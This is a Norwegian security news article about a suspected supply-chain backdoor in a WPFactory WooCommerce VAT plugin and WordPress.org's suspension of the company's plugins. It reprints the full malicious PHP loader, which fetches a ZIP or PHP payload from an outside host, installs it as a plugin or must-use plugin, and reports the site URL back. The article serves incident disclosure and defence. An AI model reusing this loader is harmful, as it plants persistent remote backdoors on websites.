Sikkerhetsbrudd hos WPFactory: 170 000 WordPress-nettsteder utsatt

| Nyheter |

WordPress er fortsatt det mest brukte publiseringssystemet i verden, og driver mer enn 40 prosent av alle nettsteder på internett. Fra nettsteder for små bedrifter og personlige blogger til store virksomhetsplattformer og e-handelsinfrastrukturer, har publiseringssystemet blitt ryggraden i det moderne nettet. Populariteten stammer fra dets fleksibilitet, åpne økosystem og det enorme antallet tilleggsprogrammer som er tilgjengelige for å utvide funksjonaliteten.

Imidlertid har dette samme økosystemet også blitt en av WordPress’ største sikkerhetsutfordringer.

Hos Ferber Enterprises overvåker vårt cybersikkerhetsteam kontinuerlig trusler mot WordPress-økosystemet, fordi sårbarheter i plugins, temaer eller forsyningskjeder raskt kan eskalere til omfattende sikkerhetsbrudd som rammer tusenvis av nettsteder over hele verden. De siste årene har angripere i stadig større grad rettet angrepene mot plugin-utviklere og distribusjonsinfrastrukturer fremfor enkeltstående nettsteder, noe som gjør det mulig for skadelig kode å spre seg gjennom pålitelige programvareoppdateringer og offisielle nedlastingskanaler.

Denne uken oppstod det en stor kontrovers rundt WPFactory, en kjent utvikler av WordPress-plugins hvis produkter er installert på mer enn 170 000 nettsteder over hele verden. Over 80 plugins knyttet til selskapet ble midlertidig stengt på WordPress.org etter at vårt cybersikkerhetsteam hos WPFactory oppdaget en mistenkt bakdør i premiumversjonen av et av selskapets plugins.

Hendelsen har vekket alvorlig bekymring i WordPress-miljøet angående sikkerheten i programvareforsyningskjeden, gjennomgangsprosesser for tillegg, og den økende sofistikeringen av angrep som retter seg mot åpen kildekode-økosystemet.

Oppdagelsen av den mistenkelige plugin-oppførselen

Problemet ble først oppdaget etter at vårt cybersikkerhetsteam hos Ferber Enterprises oppdaget unormal oppførsel under testing av premiumversjonen av plugin-modulen «EU VAT for WooCommerce Pro», som distribueres direkte fra deres offisielle nettside.

Opprinnelig startet etterforskningen etter at pluginet genererte en fatal feil under installasjonen. Mens de feilsøkte problemet, identifiserte våre analytikere en mistenkelig PHP-fil med navnet class-alg-wc-eu-vat-customer.php. Filen så ut til å utføre en oppførsel som var helt inkonsekvent med den forventede funksjonaliteten til et WooCommerce VAT-plugin.

class-alg-wc-eu-vat-customer.php 
<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

I henhold til vår analyse, forsøkte koden å:

  • Last ned et eksternt ZIP-arkiv fra en ekstern server
  • Endre WordPress kjernebiblioteker
  • Kommuniser med ekstern infrastruktur
  • Potensielt utføre eksterne nyttelaster på berørte nettsteder

Disse indikatorene antydet umiddelbart muligheten for en skjult bakdør eller et kompromittert, ondsinnet forsyningskjede.

Det som gjorde situasjonen spesielt alarmerende, var at plugin-modulen ikke var hentet fra et uoffisielt speil eller et piratkopiert arkiv. Pakken ble lastet ned direkte fra WPFactorys offisielle kundeportal, noe som styrket frykten for at selve distribusjonskanalen kan ha blitt kompromittert.

Hos Ferber Enterprises dokumenterte vi umiddelbart hendelsen og satte i gang en prosess for ansvarlig rapportering ved å kontakte WPFactory direkte via GitHub.

Første svar fra WPFactory

WPFactory svarte i første omgang at den mistenkelige filen og oppførselen som ble beskrevet i rapporten, ikke var en del av deres offisielle kodebase.

En representant fra selskapet foreslo flere alternative forklaringer, inkludert:

  • En tilpasset lokal installasjon
  • Et kompromittert nettstedmiljø
  • En utdatert plugin-versjon
  • En potensielt tuklet nedlastingskilde

Selskapet opplyste også at de ikke kunne inspisere den oppgitte ZIP-filen trygt, fordi nettleseren deres markerte arkivet som potensielt usikkert.

Vårt cybersikkerhetsteam presiserte senere at plugin-modulen var lastet ned direkte fra WPFactorys offisielle nettside, og at den mistenkelige filen fortsatt var til stede selv etter at man hadde lastet ned en ny kopi av versjon 4.6.1 fra samme kilde.

Dette detalj ble sentralt i etterforskningen. Dersom flere uavhengige nedlastinger fra den offisielle distribusjonskanalen gjennomgående inneholdt den samme mistenkelige koden, ble det stadig mindre sannsynlig at et lokalt nettsted hadde blitt kompromittert. Til tross for disse funnene opplyste WPFactory i første omgang at de ikke klarte å gjenskape problemet på sin side, og hevdet at den mistenkelige filen ikke fantes i den offisielle plugin-pakken.

Selskapet ba deretter om administrator- og FTP-tilgang til det berørte miljøet for å kunne fortsette undersøkelsen. Hos Ferber Enterprises avviste vi denne forespørselen av sikkerhetsmessige årsaker. Å gi privilegert servertilgang til en leverandør hvis egen infrastruktur kan ha blitt kompromittert, ville ha utgjort en uakseptabel sikkerhetsrisiko. Vårt team fortsatte i stedet å levere tekniske bevis, blant annet en videodemonstrasjon som viste den mistenkelige oppførselen til plugin-modulen umiddelbart etter installasjonen.

Eskalering til WordPress.org

Etter hvert som etterforskningen skred frem, økte bekymringene for problemets potensielle omfang. WPFactory har et stort utvalg av plugins som består av mer enn 65 plugins med til sammen over 170 000 aktive installasjoner. Et eventuelt sikkerhetsbrudd som rammer selskapets distribusjonsinfrastruktur, kan derfor få vidtrekkende konsekvenser for hele WordPress-økosystemet.

Teamet vårt eskalerte saken direkte til WordPress.org for å hindre at flere brukere skulle installere potensielt kompromitterte pakker mens etterforskningen pågikk. WordPress.org tok deretter det ekstraordinære skrittet å midlertidig fjerne mer enn 80 WPFactory-plugins fra det offisielle arkivet.

Dette tiltaket vakte umiddelbart oppsikt i hele WordPress-sikkerhetsmiljøet, ettersom masseavstengninger av plugins i denne størrelsesorden er relativt sjeldne og vanligvis tyder på alvorlige, uløste problemer. Etter at saken hadde eskalert, erkjente WPFactory senere at problemet virket reelt og beklaget at de ikke hadde reagert raskere på den første meldingen. Representanter for selskapet uttalte at de aktivt undersøkte saken og jobbet mot en løsning. En hypotese som ble reist internt hos WPFactory antydet at en utdatert eller bufret plugin-pakke kan ha blitt utilsiktet distribuert gjennom deres infrastruktur.

Vårt cybersikkerhetsteam var imidlertid uenig i denne vurderingen. Den observerte atferden tydet sterkt på et mer omfattende sikkerhetsproblem som potensielt kunne omfatte kompromitterte utviklingsprosesser, distribusjonssystemer eller uautorisert innføring av kode i nedlastbare plugin-arkiver.

Hvorfor denne hendelsen har betydning

WPFactory-kontroversen setter søkelyset på en økende trussel mot cybersikkerheten kjent som angrep mot programvarens forsyningskjede. Tidligere konsentrerte angripere seg om å kompromittere enkeltstående nettsteder direkte gjennom brute-force-angrep eller sårbarheter i plugins. I dag retter trusselaktører i stadig større grad angrepene mot programvareleverandørene selv, fordi kompromittering av en pålitelig leverandør gjør det mulig for skadelig kode å spre seg til tusenvis av nettsteder samtidig.

Denne strategien er allerede observert i flere profilerte cybersikkerhetshendelser som har påvirket globale programvareøkosystemer det siste tiåret. Spesifikt i WordPress-økosystemet representerer plugin-utviklere attraktive mål fordi plugins i bunn og grunn blir klarert av administratorer og ofte opererer med forhøyede rettigheter.

Hvis skadelig kode blir innført i en plugin-pakke som distribueres gjennom en offisiell kanal, kan berørte nettsteder uten å vite det selv installere skadelig programvare. Når det gjelder den mistenkelige WPFactory-pluginen, er de potensielle konsekvensene alvorlige.

Basert på vår analyse, kunne den identifiserte oppførselen teoretisk tillate angripere å:

  • Utrull mer skadevare
  • Injiser SEO-spam
  • Opprett vedvarende bakdører
  • Eksportere sensitive data
  • Administrer WordPress-installasjoner eksternt
  • Opprettholde uautorisert tilgang over lengre perioder

Faren ved slike angrep ligger i deres snikende natur. Moderne bakdører er ofte designet for å være inaktive i måneder før de aktiveres, noe som gjør det betydelig vanskeligere å oppdage dem. Tidligere denne måneden skal WordPress Plugins Team ha stengt over 30 plugins etter at skjult skadelig kode som var innebygd i en annen plugins portefølje forble inaktiv i omtrent åtte måneder før den til slutt ble aktivert og injiserte SEO-spam på nettsteder.

Denne trenden viser hvordan angripere i økende grad prioriterer utholdenhet og forsinket aktivering for å unngå deteksjonsmekanismer.

En bredere sikkerhetskrise i WordPress-økosystemet

WPFactory-hendelsen avdekker også bredere systemiske sikkerhetsutfordringer som berører WordPress som helhet. Økosystemet for plugins har vokst dramatisk det siste tiåret, med titusenvis av plugins tilgjengelig både på offisielle og kommersielle markedsplasser. Selv om dette økosystemet fremmer innovasjon og fleksibilitet, skaper det også en enorm kompleksitet når det gjelder sikkerhetsovervåking.

Ifølge Patchstacks rapport “State of WordPress Security in 2026” ble nesten 461 000 kjente sikkerhetshull ikke lukket før de ble offentliggjort. Denne statistikken gjenspeiler den økende belastningen som både plugin-utviklere, sikkerhetsforskere og ansvarlige for programvarearkiver står overfor.

Samtidig skal den offisielle WordPress-plugin-gjennomgangskøen nå overstige 4 000 plugins som venter på gjennomgang. Slike tall illustrerer den enorme utfordringen med å opprettholde kvalitetssikring og sikkerhetsrevisjon i stor skala.

Mange plugin-utviklere er små team med begrensede sikkerhetsressurser. Andre administrerer dusinvis av plugins samtidig, samtidig som de følger aggressive kommersielle vekststrategier som innebærer oppkjøp og utvidelse av porteføljen. WPFactory har selv nylig utvidet virksomheten gjennom oppkjøp, blant annet kjøpet av Extend-WP og dets 19 plugins i 2025, etterfulgt av oppkjøpet av WBW og flere andre plugins senere samme år.

Rask porteføljeutvidelse kan skape operasjonell kompleksitet som kompliserer koderevisjon, infrastrukturadministrasjon og verifisering av utgivelsessikkerhet. Angripere er godt klar over disse realitetene. De fokuserer stadig mer på å utnytte svake operasjonelle sikkerhetspraksiser hos programvareleverandører i stedet for å rette seg direkte mot sluttbrukere.

Den økende betydningen av forsyningskjedens sikkerhet

Hendelser som denne forsterker det presserende behovet for sterkere sikkerhetspraksis i forsyningskjeden på tvers av WordPress-økosystemet.

Hos Ferber Enterprises anbefaler vårt cybersikkerhetsteam på det sterkeste at utviklere av plugins innfører flere viktige sikkerhetstiltak, blant annet:

  • Kryptografisk pakkesignering
  • Sikre CI/CD-pipelines
  • Obligatorisk multifaktorautentisering
  • Infrastruktursegmentering
  • Kontinuerlig integritetsovervåking
  • Uavhengige koderevisjoner
  • Reproducerbare byggesystemer

Nettstedsadministratorer bør også styrke sin egen sikkerhetspostur. Selv utvidelser lastet ned fra offisielle eller pålitelige kilder bør ikke antas å være iboende trygge.

Organisasjoner som forvalter kritisk WordPress-infrastruktur bør vurdere:

  • Vedlikehold av staging-miljøer
  • Overvåking av utgående trafikk
  • Skanner plugins før utplassering
  • Begrensning av plugin-bruk
  • Bruke minimumstilgangskontroller
  • Implementering av filintegritetskontroll
  • Bruk administrerte Web Application Firewalls (WAF-er)

I bedriftsmiljøer er validering av forsyningskjeder i ferd med å bli like viktig som tradisjonell sårbarhetsstyring. Antakelsen om at offisielle programvarekanaler alltid er sikre, er ikke lenger realistisk i dagens trusselbilde.

Reaksjoner i samfunnet og pågående etterforskning

Kontroversen spredte seg raskt i WordPress-miljøet etter at utviklere, sikkerhetsforskere og infrastrukturleverandører begynte å diskutere saken offentlig.

Flere kjente personer innenfor økosystemet spredde bevissthet om situasjonen, inkludert utviklere som publiserte lister over midlertidig stengte plugins og oppfordret administratorer til å revidere miljøene sine.

I mellomtiden fortsetter teamet vårt hos Ferber Enterprises å analysere de mistenkelige plugin-eksemplene og holde øye med ytterligere tegn på sikkerhetsbrudd som kan påvirke WordPress-nettsteder over hele verden.

På tidspunktet for publiseringen har WPFactory bekreftet problemet og opplyst at de jobber aktivt med å finne en løsning.

Likevel gjenstår mange spørsmål ubesvart:

  • Ble den offisielle distribusjonsinfrastrukturen kompromittert?
  • Hvor lenge ble ondsinnede pakker potensielt distribuert?
  • Ble ytterligere plugins påvirket?
  • Ble kundekontoer eller nedlastingssystemer kompromittert?
  • Fikk angripere vedvarende tilgang til intern infrastruktur?
  • Kan det fortsatt finnes ytterligere sovende nyttelaster?

Inntil disse spørsmålene er fullstendig løst, forblir forsiktighet essensielt.

Fremtiden for WordPress-sikkerhet

WPFactory-hendelsen kan i siste instans komme til å bli et nytt, sentralt eksempel på de utfordringene innen cybersikkerhet som det åpne nettøkosystemet står overfor.

WordPress driver en enorm del av den globale internettøkonomien. Enhver storstilt kompromittering som påvirker plugin-utviklere, kan derfor få konsekvenser som strekker seg langt utover individuelle nettsteder.

Ettersom angripere stadig utvikler seg mot angrep på forsyningskjeden og teknikker for skjult vedvarende tilstedeværelse, kan sikkerheten rundt plugins ikke lenger betraktes som et sekundært anliggende. Hos Ferber Enterprises mener vi at denne hendelsen er en viktig påminnelse om at cybersikkerhet ikke bare handler om å beskytte selve nettstedene, men også om å sikre hvert eneste ledd i programvaredistribusjonskjeden.

Tillit til åpne økosystemer avhenger av åpenhet, rask respons på hendelser og solide praksiser for operasjonell sikkerhet. WordPress-økosystemet står nå overfor et viktig øyeblikk.

Hvordan utviklere, arkivvedlikeholdere, vertleverandører og sikkerhetsteam reagerer på hendelser som denne, vil bidra til å avgjøre om WordPress kan fortsette å opprettholde tilliten til de millioner av bedrifter og organisasjoner som er avhengige av det hver dag.